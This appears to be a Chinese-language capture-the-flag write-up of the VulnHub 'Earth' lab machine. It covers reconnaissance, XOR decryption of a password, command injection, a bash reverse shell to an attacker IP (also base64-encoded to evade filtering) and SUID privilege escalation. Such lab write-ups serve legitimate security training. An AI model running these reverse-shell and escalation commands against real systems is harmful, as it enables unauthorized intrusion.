vulnhub——Earth靶机

这篇具有很好参考价值的文章主要介绍了vulnhub——Earth靶机。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、概要

攻击机:192.168.60.148
靶机:192.168.60.174
靶机下载地址:https://download.vulnhub.com/theplanets/Earth.ova.torrent

二、主机发现

netdiscover

直接用netdiscover模糊搜索一下主机

vulnhub——Earth靶机

可以发现靶机地址为192.168.60.174 

三、信息收集

sudo nmap -sS -A -T4 192.168.60.174

vulnhub——Earth靶机

80端口返回HTTP400,向下看发现有DNS解析

DNS:earth.local
DNS:terratest.earth.local

 修改一下hosts文件

sudo vi /etc/hosts
    必须使用root权限,不然无法保存

vulnhub——Earth靶机

 再次nmap进行扫描,之前返回HTTP400的页面就没问题了

vulnhub——Earth靶机

访问http://earth.local
http://terratest.earth.local
https://earth.local/
三个页面是相同的内容

vulnhub——Earth靶机

下面有三行数值

vulnhub——Earth靶机

Previous Messages:
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

 https://terratest.earth.local的页面内容不一样

vulnhub——Earth靶机

四、目录扫描

dirb扫描

http://earth.local、https://earth.local和http://terratest.earth.local的扫描结果都是一样的

vulnhub——Earth靶机

 vulnhub——Earth靶机

https://terratest.earth.local的结果不一样

vulnhub——Earth靶机

信息收集

网站下有robots.txt文件

前面的都是后缀,最后一个是文件名

vulnhub——Earth靶机

 猜测一下后缀,测出来后缀为txt后缀

vulnhub——Earth靶机

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

译文:
测试安全邮件系统注意事项:
*使用XOR加密作为算法,应该像RSA中使用的那样安全。
*地球已确认他们已收到我们发送的消息。
*testdata.txt用于测试加密。
*terra用作管理门户的用户名。
待办事项:
*我们如何将每月的密钥安全地发送到地球?还是应该每周更换一次密钥?
*需要测试不同的密钥长度以防止暴力破解。密钥应该多长时间?
*需要改进消息传递界面和管理面板的界面,目前非常基本。

获取信息:
1、密码采用XOR加密算法
2、testdata.txt文件
3、用户名为terra
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

译文:
根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的前十亿年内,海洋中出现了生命,并开始影响地球的大气层和表面,导致厌氧生物的扩散,后来又出现了有氧生物。一些地质证据表明,生命可能早在41亿年前就出现了。

五、密码破解

XOR解密

根据上面我们可以尝试破解一下密码

结合前面页面显示的密钥可以尝试一下

前面两个密钥的解码都是乱码,只有最后一个可以正常解码

vulnhub——Earth靶机

 先把密钥进行一下hex转换为utf8

再配合密文进行XOR解密,编码为utf8

得出结果

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

一串由earthclimatechangebad4humans循环组成的字符串
明文密码应该就是earthclimatechangebad4humans

 结合前面的用户名,找到之前扫出来的的登录页面尝试一下

vulnhub——Earth靶机

vulnhub——Earth靶机

 用户登录

用户名:terra
密码:earthclimatechangebad4humans

登陆成功

vulnhub——Earth靶机

 这里是一个命令执行的输入框,有命令执行漏洞存在的可能性

查看一下权限为普通用户

vulnhub——Earth靶机

六、提权

反弹shell

尝试bash直接反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.60.148/8888 <&1'

没有反应,无法执行

应该是对其中的敏感内容进行了过滤

对反弹shell的命令进行一下base64编码试试

(注意这里的命令不一样了,少去了前面的部分)

 vulnhub——Earth靶机

YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguNjAuMTQ4Lzg4ODggPCYxCg==

只输入base64编码数据是无法执行的,要结合解码命令使用
echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguNjAuMTQ4Lzg4ODggPCYxCg== | base64 -d | bash

 先使用nc对本地8888端口进行监听

vulnhub——Earth靶机

成功反弹shell

vulnhub——Earth靶机

依旧是普通用户权限

查看一下靶机中有权限的文件

find / -perm -u=s -type f 2>/dev/null

vulnhub——Earth靶机

这里的reset_root根据文件名应该可以用来重置root密码

查看一下这个文件的内容

vulnhub——Earth靶机

虽然有乱码,但是可以大概看出来是把root密码更改为了Earth

但是尝试提权的时候,发现失败了

vulnhub——Earth靶机

查看返回信息的话,应该就是执行的过程中出了什么差错

利用ltrace调试文件

将文件传回攻击机进行查看

攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名

vulnhub——Earth靶机

 靶机传回文件

vulnhub——Earth靶机

攻击机接收到了

vulnhub——Earth靶机

先给文件赋权

vulnhub——Earth靶机

ltrace跟踪库函数调用,发现缺少三个文件

vulnhub——Earth靶机

SUID提权

在靶机上创建这三个文件再执行试试

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

vulnhub——Earth靶机

 显示密码修改成功

su提权试试

vulnhub——Earth靶机

提权成功

切换到root目录下拿到flag

vulnhub——Earth靶机文章来源地址https://www.toymoban.com/news/detail-432372.html

到了这里,关于vulnhub——Earth靶机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 192.168.1.1路由器概念介绍及设置问题解析

    对于新手朋友来说,都很想知道192.168.1.1或192.168.0.1究竟是什么?或是在路由器设置过程会遇到很多问题都不知道怎么解决,那么下面就为大家详细解答这两个问题,希望能帮助到大家。 192.168.1.1路由器设置之概念理解 初学者一看到192.168.1.1或192.168.0.1就很想知道他们究竟是什

    2024年02月06日
    浏览(28)
  • 192.168.1.253手机上打不开的解决办法

    本文介绍了192.168.1.253手机登录打不开解决办法,192.168.1.253是TP-Link、水星和迅捷等迷你无线路由器的设置地址;很多用户用手机设置迷你无线路由器时,手机上打不开192.168.1.253登录页面。 192.168.1.253手机登录打不开 一、手机连接到迷你路由器WiFi信号 迷你无线路由器,在出厂

    2024年02月08日
    浏览(32)
  • FAST路由器登陆地址192.168.1.1设置步骤

    想必每个人都知道,我们想要使用宽带路由器共享上网时,必须要对共享上网的电脑和宽带路由器进行设置,本篇以迅捷路由器给大家介绍如何设置共享上网。 一 、在硬件连接完成以后,需要有一台已经与宽带路由器的LAN口相连接的电脑来进行具体的设置,这台电脑必须安

    2024年02月05日
    浏览(36)
  • 解决192.168.1.1路由器进不去的故障

    192.168.1.1进不去的原因 当你访问http://www.routerlogin.net/welcome.htm或welcome.htm或http://192.168.1.1页时,浏览器提示:无法显示该页面,总结起来,导致192.168.1.1进不去问题的原因通常是以下几种: 1.用来设置路由器的电脑的TCP/IP属性设置有误; 2.设置路由器的电脑的TCP/IP设置无误,路

    2024年02月08日
    浏览(31)
  • 192.168.1.1路由器进不去怎么办

    我们有时候发现电脑路由器登陆不了了,输入路由器的地址192.168.1.1无法访问,而是出现了域名解析错误(错误代码:105)这时候我们应该怎么办呢?小编根据自己的经验说一下路由器登陆不了的处理方法,希望对你有所帮助!本张图篇来自网络图片处理,版权归原作者所有!

    2024年02月07日
    浏览(32)
  • 192.168.1.1打不开路由器无法进入管理界面

    192.168.1.1打不开路由器设置。刚买了一个无线路由器,插了网线,不知道为什么就是,打开电脑。想设置一下路由器。不知道为什么就是登陆不了,看到虽然现实链接上wifi,可是没有设置。是登陆不了的。下文就让小编跟大家介绍怎么排除192.168.1.1打不开的办法。 192.168.1.1打

    2024年02月07日
    浏览(32)
  • 输入192.168.1.1却无法登陆路由器的解决办法

    有时候我们登陆路由器进行设置时,偶尔会遇到在IE浏览器地址栏输入192.168.1.1路由器地址,无法弹出用户名和密码对话框,针对此类路由器问题那如何解决呢? 1、检查电脑是否和LAN口(1,2,3,4口中任意一口)连好,路由器上对应的指示灯是否是亮的。 2、如果是拨号上网

    2024年02月05日
    浏览(36)
  • 办公室电脑群DNS出现问题,显示192.168.1.1

    (1)DNS会变为192.168.1.1 (2)交换机断电重启会变好,后面可能仍然出问题 (3)我tracert了一下提供的两个IP,其中一个就正常路由,一个失败。 在房间找到一个很小的那种魔方无线路由器,接入了网络,可能没有配置好。 (1)我昨天了解到的信息是告诉我只有插满的两个交

    2024年02月16日
    浏览(36)
  • 路由器选择192.168.1.1作为默认网关的3个原因

    我们每次设置无线路由器,大部分都会在浏览器输入192.168.1.1。那我们是否想过这样的问题额。为什么偏偏选择额192.168.1.1作为默认网关额? 今天小编就从一下3个方面来解释这个问题。 界面 1、历史层面 也就是在宽带遍布全球以前,无论是企业用还是家用网关用的最多的默认

    2024年02月06日
    浏览(36)
  • TP-LINK路由器192.168.1.253设置流程

    192.168.1.253 一般都是TP-LINK路由器,有些小伙伴不太会192.168.1.253 路由器设置。而且有的还打不开192.168.1.253这个页面。 这里小编就来为大家分享192.168.1.253 路由器设置流程。 192.168.1.253 路由器设置流程 1、先打开浏览器!然后在浏览器里面输入192.168.1.253! 按回车之后就会出现登

    2024年02月07日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包